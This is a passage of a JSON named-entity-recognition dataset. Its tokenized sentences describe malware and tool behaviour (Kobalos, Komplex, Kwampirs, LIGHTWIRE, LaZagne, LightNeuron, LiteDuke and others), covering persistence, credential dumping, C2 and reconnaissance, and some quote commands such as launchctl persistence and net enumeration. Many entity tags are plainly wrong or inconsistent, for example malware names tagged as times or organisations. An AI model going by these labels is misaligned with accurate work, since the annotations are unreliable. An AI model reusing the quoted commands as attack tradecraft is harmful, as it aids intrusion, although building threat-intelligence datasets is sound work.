"Kobalos's", "post-authentication", "communication", "channel", "uses", "a", "32-byte-long", "password", "with", "RC4", "for", "inbound", "and", "outbound", "traffic." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "record", "the", "hostname", "and", "kernel", "version", "of", "the", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "record", "the", "IP", "address", "of", "the", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "modify", "timestamps", "of", "replaced", "files,", "such", "as", "<code>ssh</code>", "with", "the", "added", "credential", "stealer", "or", "<code>sshd</code>", "used", "to", "deploy", "Kobalos." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kobalos", "is", "triggered", "by", "an", "incoming", "TCP", "connection", "to", "a", "legitimate", "service", "from", "a", "specific", "source", "port." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "spawn", "a", "new", "pseudo-terminal", "and", "execute", "arbitrary", "commands", "at", "the", "command", "prompt." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Komplex", "trojan", "supports", "file", "deletion." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "The", "Komplex", "payload", "is", "stored", "in", "a", "hidden", "directory", "at", "<code>/Users/Shared/.local/kextd</code>." ], "ner_tags": [ "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Komplex", "trojan", "creates", "a", "persistent", "launch", "agent", "called", "with", "<code>$HOME/Library/LaunchAgents/com.apple.updates.plist</code>", "with", "<code>launchctl", "load", "-w", "~/Library/LaunchAgents/com.apple.updates.plist</code>." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "OsInfo", "function", "in", "Komplex", "collects", "a", "running", "process", "list." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "The", "Komplex", "C2", "channel", "uses", "an", "11-byte", "XOR", "algorithm", "to", "hide", "data." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "OsInfo", "function", "in", "Komplex", "collects", "the", "current", "running", "username." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Komplex", "C2", "channel", "uses", "HTTP", "POST", "requests." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Before", "writing", "to", "disk,", "Kwampirs", "inserts", "a", "randomly", "generated", "string", "into", "the", "middle", "of", "the", "decrypted", "payload", "in", "an", "attempt", "to", "evade", "hash-based", "detections." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "decrypts", "and", "extracts", "a", "copy", "of", "its", "main", "DLL", "payload", "when", "executing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "domain", "groups", "with", "the", "command", "<code>net", "localgroup", "/domain</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "downloads", "additional", "files", "that", "are", "base64-encoded", "and", "encrypted", "with", "another", "cipher." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "uses", "a", "large", "list", "of", "C2", "servers", "that", "it", "cycles", "through", "until", "a", "successful", "connection", "is", "established." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "files", "and", "directories", "in", "C:\\", "with", "the", "command", "<code>dir", "/s", "/a", "c:\\", ">>", "\"C:\\windows\\TEMP\\[RANDOM].tmp\"</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Kwampirs", "downloads", "additional", "files", "from", "C2", "servers." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "accounts", "with", "the", "command", "<code>net", "users</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "users", "belonging", "to", "the", "local", "users", "and", "administrators", "groups", "with", "the", "commands", "<code>net", "localgroup", "administrators</code>", "and", "<code>net", "localgroup", "users</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "establishes", "persistence", "by", "adding", "a", "new", "service", "with", "the", "display", "name", "\"WMI", "Performance", "Adapter", "Extension\"", "in", "an", "attempt", "to", "masquerade", "as", "a", "legitimate", "WMI", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "network", "shares", "with", "the", "command", "<code>net", "share</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "password", "policy", "information", "with", "the", "command", "<code>net", "accounts</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "running", "services", "with", "the", "command", "<code>tasklist", "/v</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "available", "servers", "with", "the", "command", "<code>net", "view</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "uses", "rundll32.exe", "in", "a", "Registry", "value", "added", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "copies", "itself", "over", "network", "shares", "to", "move", "laterally", "on", "a", "victim", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "OS", "version", "information", "such", "as", "registered", "owner", "details,", "manufacturer", "details,", "processor", "type,", "available", "storage,", "installed", "patches,", "hostname,", "version", "info,", "system", "date,", "and", "other", "system", "information", "by", "using", "the", "commands", "<code>systeminfo</code>,", "<code>net", "config", "workstation</code>,", "<code>hostname</code>,", "<code>ver</code>,", "<code>set</code>,", "and", "<code>date", "/t</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "network", "adapter", "and", "interface", "information", "by", "using", "the", "commands", "<code>ipconfig", "/all</code>,", "<code>arp", "-a</code>", "and", "<code>route", "print</code>.", "It", "also", "collects", "the", "system's", "MAC", "address", "with", "<code>getmac</code>", "and", "domain", "configuration", "with", "<code>net", "config", "workstation</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "active", "and", "listening", "connections", "by", "using", "the", "command", "<code>netstat", "-nao</code>", "as", "well", "as", "a", "list", "of", "available", "network", "mappings", "with", "<code>net", "use</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "registered", "owner", "details", "by", "using", "the", "commands", "<code>systeminfo</code>", "and", "<code>net", "config", "workstation</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "collects", "a", "list", "of", "running", "services", "with", "the", "command", "<code>tasklist", "/svc</code>." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kwampirs", "creates", "a", "new", "service", "named", "WmiApSrvEx", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "LIGHTWIRE", "can", "imbed", "itself", "into", "the", "legitimate", "`compcheckresult.cgi`", "component", "of", "Ivanti", "Connect", "Secure", "VPNs", "to", "enable", "command", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LIGHTWIRE", "can", "RC4", "decrypt", "and", "Base64", "decode", "C2", "commands." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "LIGHTWIRE", "can", "RC4", "encrypt", "C2", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "B-HackOrg", "O" ] }, { "tokens": [ "LIGHTWIRE", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "LIGHTWIRE", "is", "a", "web", "shell", "capable", "of", "command", "execution", "and", "establishing", "persistence", "on", "compromised", "Ivanti", "Secure", "Connect", "VPNs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "communicate", "over", "SSL", "using", "the", "private", "key", "from", "the", "Ivanti", "Connect", "Secure", "web", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "append", "malicious", "components", "to", "the", "`tmp/tmpmnt/bin/samba_upgrade.tar`", "archive", "inside", "the", "factory", "reset", "partition", "in", "attempt", "to", "persist", "post", "reset." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Features", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "initialize", "itself", "as", "a", "daemon", "to", "run", "persistently", "in", "the", "background." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "monitor", "for", "system", "upgrade", "events", "by", "checking", "for", "the", "presence", "of", "`/tmp/data/root/dev`." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "function", "as", "a", "stand-alone", "backdoor", "communicating", "over", "the", "`/tmp/clientsDownload.sock`", "socket." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "has", "the", "ability", "to", "function", "as", "a", "SOCKS", "proxy." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "LITTLELAMB.WOOLTEA", "can", "check", "the", "type", "of", "Ivanti", "VPN", "device", "it", "is", "running", "on", "by", "executing", "`first_run()`", "to", "identify", "the", "first", "four", "bytes", "of", "the", "motherboard", "serial", "number." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LOWBALL", "uses", "the", "Dropbox", "cloud", "storage", "service", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "LOWBALL", "uses", "the", "Dropbox", "API", "to", "request", "two", "files,", "one", "of", "which", "is", "the", "same", "file", "as", "the", "one", "dropped", "by", "the", "malicious", "email", "attachment.", "This", "is", "most", "likely", "meant", "to", "be", "a", "mechanism", "to", "update", "the", "compromised", "host", "with", "a", "new", "version", "of", "the", "LOWBALL", "malware." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "LOWBALL", "command", "and", "control", "occurs", "via", "HTTPS", "over", "port", "443." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credential", "information", "from", "/etc/shadow", "using", "the", "shadow.py", "module." ], "ner_tags": [ "B-Idus", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "LaZagne", "can", "perform", "credential", "dumping", "from", "MSCache", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credentials", "from", "chats,", "databases,", "mail,", "and", "WiFi." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credentials", "from", "databases,", "mail,", "and", "WiFi", "across", "multiple", "platforms." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credentials", "from", "web", "browsers", "such", "as", "Google", "Chrome,", "Internet", "Explorer,", "and", "Firefox." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Tool", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credentials", "from", "macOS", "Keychains." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "perform", "credential", "dumping", "from", "LSA", "secrets", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "perform", "credential", "dumping", "from", "memory", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "LaZagne", "can", "use", "the", "`<PID>/maps`", "and", "`<PID>/mem`", "files", "to", "identify", "regex", "patterns", "to", "dump", "cleartext", "passwords", "from", "the", "browser's", "process", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LaZagne", "can", "obtain", "credentials", "from", "Vault", "files." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "contains", "a", "function", "to", "encrypt", "and", "store", "emails", "that", "it", "collects." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "LightNeuron", "can", "be", "configured", "to", "automatically", "collect", "files", "under", "a", "specified", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "can", "be", "configured", "to", "automatically", "exfiltrate", "files", "under", "a", "specified", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "can", "collect", "files", "from", "a", "local", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "has", "used", "AES", "and", "XOR", "to", "decrypt", "configuration", "files", "and", "commands." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "B-Way", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "LightNeuron", "encrypts", "its", "configuration", "files", "with", "AES-256." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "LightNeuron", "exfiltrates", "data", "over", "its", "email", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "O", "O" ] }, { "tokens": [ "LightNeuron", "has", "a", "function", "to", "delete", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "LightNeuron", "has", "the", "ability", "to", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "LightNeuron", "can", "store", "email", "data", "in", "files", "and", "directories", "specified", "in", "its", "configuration,", "such", "as", "<code>C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "uses", "SMTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "LightNeuron", "has", "used", "filenames", "associated", "with", "Exchange", "and", "Outlook", "for", "binary", "and", "configuration", "files,", "such", "as", "<code>winmail.dat</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "LightNeuron", "is", "capable", "of", "starting", "a", "process", "using", "CreateProcess." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "LightNeuron", "collects", "Exchange", "emails", "matching", "rules", "specified", "in", "its", "configuration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "can", "be", "configured", "to", "exfiltrate", "data", "during", "nighttime", "or", "working", "hours." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "is", "controlled", "via", "commands", "that", "are", "embedded", "into", "PDFs", "and", "JPGs", "using", "steganographic", "methods." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "uses", "AES", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "gathers", "the", "victim", "computer", "name", "using", "the", "Win32", "API", "call", "<code>GetComputerName</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "LightNeuron", "gathers", "information", "about", "network", "adapters", "using", "the", "Win32", "API", "call", "<code>GetAdaptersInfo</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "LightNeuron", "is", "capable", "of", "modifying", "email", "content,", "headers,", "and", "attachments", "during", "transit." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "LightNeuron", "has", "used", "a", "malicious", "Microsoft", "Exchange", "transport", "agent", "for", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LightNeuron", "is", "capable", "of", "executing", "commands", "via", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "obtain", "data", "from", "local", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "change", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "delete", "files." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-Way", "O", "O", "O", "B-HackOrg", "O", "B-Features", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "list", "contents", "of", "drives", "and", "search", "for", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "download", "files", "onto", "compromised", "hosts." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "change", "the", "frequency", "at", "which", "compromised", "hosts", "contact", "remote", "C2", "infrastructure." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "system", "information." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Linfo", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "start", "a", "remote", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linux", "Rabbit", "sends", "the", "payload", "from", "the", "C2", "server", "as", "an", "encoded", "URL", "parameter." ], "ner_tags": [ "I-SamFile", "I-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linux", "Rabbit", "attempts", "to", "gain", "access", "to", "the", "server", "via", "SSH." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "B-Way" ] }, { "tokens": [ "Linux", "Rabbit", "brute", "forces", "SSH", "passwords", "in", "order", "to", "attempt", "to", "gain", "access", "and", "install", "its", "malware", "onto", "the", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linux", "Rabbit", "opens", "a", "socket", "on", "port", "22", "and", "if", "it", "receives", "a", "response", "it", "attempts", "to", "obtain", "the", "machine's", "hostname", "and", "Top-Level", "Domain." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Linux", "Rabbit", "maintains", "persistence", "on", "an", "infected", "machine", "through", "rc.local", "and", ".bashrc", "files." ], "ner_tags": [ "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Linux", "Rabbit", "acquires", "valid", "SSH", "accounts", "through", "brute", "force." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "the", "ability", "to", "decrypt", "and", "decode", "multiple", "layers", "of", "obfuscation." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "B-Features", "I-Features", "O", "B-Features", "O" ] }, { "tokens": [ "LiteDuke", "can", "securely", "delete", "files", "by", "first", "writing", "random", "data", "to", "the", "file." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "the", "ability", "to", "download", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "LiteDuke", "can", "query", "the", "Registry", "to", "check", "for", "the", "presence", "of", "<code>HKCU\\Software\\KasperskyLab</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "LiteDuke", "can", "create", "persistence", "by", "adding", "a", "shortcut", "in", "the", "<code>CurrentVersion\\Run</code>", "Registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "the", "ability", "to", "check", "for", "the", "presence", "of", "Kaspersky", "security", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "been", "packed", "with", "multiple", "layers", "of", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "used", "image", "files", "to", "hide", "its", "loader", "component." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "can", "enumerate", "the", "CPUID", "and", "BIOS", "version", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "has", "the", "ability", "to", "discover", "the", "proxy", "configuration", "of", "Firefox", "and/or", "Opera." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "LiteDuke", "can", "enumerate", "the", "account", "name", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "can", "wait", "30", "seconds", "before", "executing", "additional", "code", "if", "security", "software", "is", "detected." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LiteDuke", "can", "use", "HTTP", "GET", "requests", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "send", "collected", "data,", "including", "screenshots,", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "has", "the", "ability", "to", "download", "payloads", "containing", "system", "commands", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", 